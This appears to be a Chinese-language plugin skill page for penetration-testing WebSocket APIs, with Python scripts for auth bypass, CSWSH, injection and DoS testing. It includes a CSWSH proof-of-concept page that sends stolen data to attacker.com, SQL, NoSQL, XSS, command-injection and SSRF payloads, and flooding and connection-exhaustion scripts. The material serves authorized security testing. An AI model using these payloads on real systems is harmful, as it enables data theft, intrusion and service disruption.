Tests WebSocket API security: missing auth on upgrade, CSWSH, message injections, input validation failures, DoS flooding, frame leaks. Uses Burp Suite and Python scripts for pentesting real-time APIs.
npx claudepluginhub killvxk/cybersecurity-skills-zhThis skill uses the workspace's default tool permissions.
- 评估使用 WebSocket(ws://)或安全 WebSocket(Secure WebSocket,wss://)协议的实时通信 API
Tests WebSocket APIs for vulnerabilities like CSWSH, auth bypass on upgrades, message injections, DoS flooding, and input validation flaws using Burp Suite and Python scripts.
Tests WebSocket APIs for security vulnerabilities like CSWSH, missing auth on upgrades, message injections, DoS flooding, and info leakage using Burp Suite and Python scripts.
Tests WebSocket implementations for authentication bypass, cross-site hijacking (CSWSH), injection attacks, and insecure message handling during authorized penetration tests. Useful for real-time apps like chat, notifications, or collaborative tools.
Share bugs, ideas, or general feedback.
不适用于未经书面授权的情况。WebSocket 测试可能中断实时服务并影响其他已连接用户。
websockets 和 asyncio 库npm install -g wscatimport asyncio
import websockets
import json
import ssl
import time
WS_URL = "wss://target-api.example.com/ws"
AUTH_TOKEN = "Bearer <token>"
# 捕获并分析 WebSocket 握手
async def analyze_handshake():
"""分析 WebSocket 升级请求和响应头。"""
try:
async with websockets.connect(
WS_URL,
extra_headers={"Authorization": AUTH_TOKEN},
ssl=ssl.create_default_context()
) as ws:
print(f"已连接到: {WS_URL}")
print(f"协议: {ws.subprotocol}")
print(f"扩展: {ws.extensions}")
# 发送测试消息
test_msg = json.dumps({"type": "ping"})
await ws.send(test_msg)
response = await asyncio.wait_for(ws.recv(), timeout=5)
print(f"服务器响应: {response}")
return True
except websockets.exceptions.InvalidStatusCode as e:
print(f"连接被拒绝: {e.status_code}")
return False
except Exception as e:
print(f"连接错误: {e}")
return False
asyncio.run(analyze_handshake())
async def test_ws_authentication():
"""测试 WebSocket 是否需要身份认证。"""
results = []
# 测试 1:不带任何认证连接
try:
async with websockets.connect(WS_URL) as ws:
await ws.send(json.dumps({"type": "get_user_data"}))
resp = await asyncio.wait_for(ws.recv(), timeout=5)
results.append({
"test": "无认证",
"status": "存在漏洞",
"response": resp[:200]
})
print(f"[漏洞] WebSocket 在无认证情况下可访问")
except websockets.exceptions.InvalidStatusCode:
results.append({"test": "无认证", "status": "安全"})
except Exception as e:
results.append({"test": "无认证", "status": f"错误: {e}"})
# 测试 2:使用无效令牌连接
try:
async with websockets.connect(WS_URL,
extra_headers={"Authorization": "Bearer invalid_token"}) as ws:
await ws.send(json.dumps({"type": "get_user_data"}))
resp = await asyncio.wait_for(ws.recv(), timeout=5)
results.append({
"test": "无效令牌",
"status": "存在漏洞",
"response": resp[:200]
})
except websockets.exceptions.InvalidStatusCode:
results.append({"test": "无效令牌", "status": "安全"})
except Exception as e:
results.append({"test": "无效令牌", "status": f"错误: {e}"})
# 测试 3:使用过期令牌连接
expired_token = "Bearer eyJhbGciOiJIUzI1NiJ9.eyJleHAiOjE2MDAwMDAwMDB9.expired"
try:
async with websockets.connect(WS_URL,
extra_headers={"Authorization": expired_token}) as ws:
await ws.send(json.dumps({"type": "get_user_data"}))
resp = await asyncio.wait_for(ws.recv(), timeout=5)
results.append({"test": "过期令牌", "status": "存在漏洞"})
except (websockets.exceptions.InvalidStatusCode, Exception):
results.append({"test": "过期令牌", "status": "安全"})
# 测试 4:令牌在查询参数中(泄露风险)
try:
async with websockets.connect(f"{WS_URL}?token={AUTH_TOKEN}") as ws:
await ws.send(json.dumps({"type": "ping"}))
resp = await asyncio.wait_for(ws.recv(), timeout=5)
results.append({
"test": "URL 中的令牌",
"status": "信息 - 令牌在查询参数中被接受(可能泄露到日志中)"
})
except Exception:
results.append({"test": "URL 中的令牌", "status": "已拒绝"})
for r in results:
print(f" [{r['status'][:10]}] {r['test']}")
return results
asyncio.run(test_ws_authentication())
async def test_cswsh():
"""测试跨站 WebSocket 劫持漏洞。"""
# CSWSH 发生于 WebSocket 服务器未校验 Origin 头部时
# 攻击者的网站可以连接到合法 WebSocket 并窃取数据
origins_to_test = [
None, # 无 Origin 头部
"https://evil.com", # 攻击者域名
"https://target-api.example.com.evil.com", # 子域名混淆
"null", # null origin(沙盒 iframe)
"https://target-api.example.com", # 合法 origin
"http://target-api.example.com", # HTTP 降级
]
print("=== CSWSH 测试 ===\n")
for origin in origins_to_test:
try:
headers = {"Authorization": AUTH_TOKEN}
if origin:
headers["Origin"] = origin
async with websockets.connect(WS_URL, extra_headers=headers) as ws:
# 尝试接收应受限制的数据
await ws.send(json.dumps({"type": "get_messages"}))
resp = await asyncio.wait_for(ws.recv(), timeout=5)
if origin and origin != "https://target-api.example.com":
print(f"[CSWSH] Origin '{origin}' -> 已接受(已收到数据)")
else:
print(f"[正常] Origin '{origin}' -> 已接受(合法来源)")
except websockets.exceptions.InvalidStatusCode as e:
print(f"[已阻止] Origin '{origin}' -> 已拒绝 ({e.status_code})")
except Exception as e:
print(f"[错误] Origin '{origin}' -> {e}")
asyncio.run(test_cswsh())
# CSWSH 利用的 PoC HTML 页面
CSWSH_POC = """
<!DOCTYPE html>
<html>
<head><title>CSWSH PoC</title></head>
<body>
<script>
// 此页面托管在 attacker.com,连接到目标 WebSocket
// 如果服务器不校验 Origin,受害者的浏览器将
// 发送 cookie/凭据,攻击者将收到数据
var ws = new WebSocket("wss://target-api.example.com/ws");
ws.onopen = function() {
console.log("已连接到目标 WebSocket");
ws.send(JSON.stringify({type: "get_messages"}));
ws.send(JSON.stringify({type: "get_user_data"}));
};
ws.onmessage = function(event) {
console.log("窃取的数据:", event.data);
// 外泄到攻击者服务器
fetch("https://attacker.com/collect", {
method: "POST",
body: event.data
});
};
</script>
<p>加载中... (CSWSH 攻击进行中)</p>
</body>
</html>
"""
async def test_ws_injection():
"""测试 WebSocket 消息中的注入漏洞。"""
INJECTION_PAYLOADS = {
"sql": [
{"type": "search", "query": "' OR '1'='1"},
{"type": "search", "query": "'; DROP TABLE messages;--"},
{"type": "get_message", "id": "1 UNION SELECT username,password FROM users--"},
],
"nosql": [
{"type": "search", "query": {"$ne": ""}},
{"type": "get_user", "filter": {"$gt": ""}},
],
"xss": [
{"type": "send_message", "content": "<script>alert('xss')</script>"},
{"type": "send_message", "content": "<img src=x onerror=alert(1)>"},
{"type": "update_name", "name": "Test<script>document.location='https://evil.com'</script>"},
],
"command": [
{"type": "process", "file": "test; cat /etc/passwd"},
{"type": "convert", "input": "test | id"},
],
"ssrf": [
{"type": "load_url", "url": "http://169.254.169.254/latest/meta-data/"},
{"type": "webhook", "callback": "http://localhost:6379/"},
],
"overflow": [
{"type": "send_message", "content": "A" * 100000},
{"type": "search", "query": "B" * 1000000},
],
}
async with websockets.connect(WS_URL,
extra_headers={"Authorization": AUTH_TOKEN}) as ws:
for category, payloads in INJECTION_PAYLOADS.items():
for payload in payloads:
try:
await ws.send(json.dumps(payload))
resp = await asyncio.wait_for(ws.recv(), timeout=5)
# 分析响应中的注入特征
resp_lower = resp.lower()
indicators = []
if any(kw in resp_lower for kw in ["sql", "syntax", "mysql", "postgresql"]):
indicators.append("SQL 错误")
if any(kw in resp_lower for kw in ["root:", "uid=", "etc/passwd"]):
indicators.append("命令执行输出")
if any(kw in resp_lower for kw in ["ami-id", "instance-id", "metadata"]):
indicators.append("SSRF 数据")
if "script" in resp_lower and "xss" not in category:
indicators.append("反射型 XSS")
if indicators:
print(f"[{category.upper()}] {json.dumps(payload)[:60]} -> {indicators}")
elif len(resp) > 10000:
print(f"[溢出] 大响应: {len(resp)} 字节")
except asyncio.TimeoutError:
pass
except websockets.exceptions.ConnectionClosed:
print(f"[崩溃] {category} payload 后连接关闭")
# 重新连接
break
asyncio.run(test_ws_injection())
async def test_ws_dos():
"""测试 WebSocket 的 DoS 漏洞。"""
print("=== WebSocket DoS 测试 ===\n")
# 测试 1:消息泛洪
async def flood_test():
async with websockets.connect(WS_URL,
extra_headers={"Authorization": AUTH_TOKEN}) as ws:
count = 0
start = time.time()
for i in range(10000):
try:
await ws.send(json.dumps({"type": "ping", "id": i}))
count += 1
except websockets.exceptions.ConnectionClosed:
break
elapsed = time.time() - start
print(f" 泛洪测试: {elapsed:.1f}s 内发送了 {count} 条消息({count/elapsed:.0f} msg/s)")
await flood_test()
# 测试 2:超大消息
async def large_message_test():
sizes = [1024, 10240, 102400, 1024000, 10240000] # 1KB 到 10MB
async with websockets.connect(WS_URL,
extra_headers={"Authorization": AUTH_TOKEN},
max_size=20*1024*1024) as ws:
for size in sizes:
try:
large_msg = json.dumps({"type": "data", "payload": "A" * size})
await ws.send(large_msg)
resp = await asyncio.wait_for(ws.recv(), timeout=5)
print(f" 超大消息({size} 字节): 已接受")
except (websockets.exceptions.ConnectionClosed, asyncio.TimeoutError) as e:
print(f" 超大消息({size} 字节): 已拒绝/已断连")
break
await large_message_test()
# 测试 3:连接耗尽
async def connection_exhaustion():
connections = []
for i in range(100):
try:
ws = await websockets.connect(WS_URL,
extra_headers={"Authorization": AUTH_TOKEN})
connections.append(ws)
except Exception:
break
print(f" 连接耗尽测试: 建立了 {len(connections)} 个并发连接")
for ws in connections:
await ws.close()
await connection_exhaustion()
asyncio.run(test_ws_dos())
| 术语 | 定义 |
|---|---|
| WebSocket | 基于单个 TCP 连接的全双工通信协议,通过 HTTP 升级握手建立连接 |
| CSWSH | 跨站 WebSocket 劫持(Cross-Site WebSocket Hijacking)——恶意网站利用受害者浏览器的凭据向合法服务器发起 WebSocket 连接 |
| Origin 校验 | 在 WebSocket 握手期间对 Origin 头部进行服务端检查,通过拒绝来自未授权域名的连接来防止 CSWSH |
| WebSocket 帧(Frame) | WebSocket 通信的基本数据单元,包含操作码、掩码、payload 长度和 payload 数据 |
| 升级握手(Upgrade Handshake) | 携带 Upgrade: websocket 和 Connection: Upgrade 头部的 HTTP 请求,用于建立 WebSocket 连接 |
| 消息泛洪(Message Flooding) | 发送大量 WebSocket 消息以耗尽服务器资源(内存、CPU、带宽) |
wscat -c wss://target.com/ws -H "Authorization: Bearer token"场景背景:某即时通讯应用使用 WebSocket 实现实时聊天,WebSocket 端点处理消息投递、正在输入指示、已读回执和用户在线状态。认证基于 Cookie。
方法:
wss://chat.example.com/ws,使用会话 Cookie 认证常见陷阱:
## 发现:跨站 WebSocket 劫持(CSWSH)导致实时数据被窃取
**ID**: API-WS-001
**严重程度**: 高 (CVSS 8.1)
**受影响端点**: wss://chat.example.com/ws
**描述**:
WebSocket 服务器在握手期间未校验 Origin 头部。攻击者可托管恶意网页,
利用受害者的会话 Cookie 向聊天服务器建立 WebSocket 连接。
所有消息、正在输入指示和在线状态数据都会被实时转发给攻击者。
**概念验证**:
将 CSWSH PoC 页面托管在 attacker.com。当已登录用户访问该页面时,
JavaScript 会向聊天服务器建立 WebSocket 连接。服务器使用受害者的
Cookie 对连接进行认证,并将所有实时聊天数据发送给攻击者的连接。
**影响**:
实时拦截任何访问攻击者页面的用户的所有私人消息、在线状态数据和输入指示。
**修复建议**:
1. 将 Origin 头部与合法域名白名单进行校验
2. 在 WebSocket 握手 URL 中实现 CSRF 令牌
3. 对 WebSocket 使用基于令牌的认证(Authorization 头部)而非 Cookie
4. 实施逐消息授权检查,而不仅仅是连接级认证
5. 对每个连接的 WebSocket 消息量添加速率限制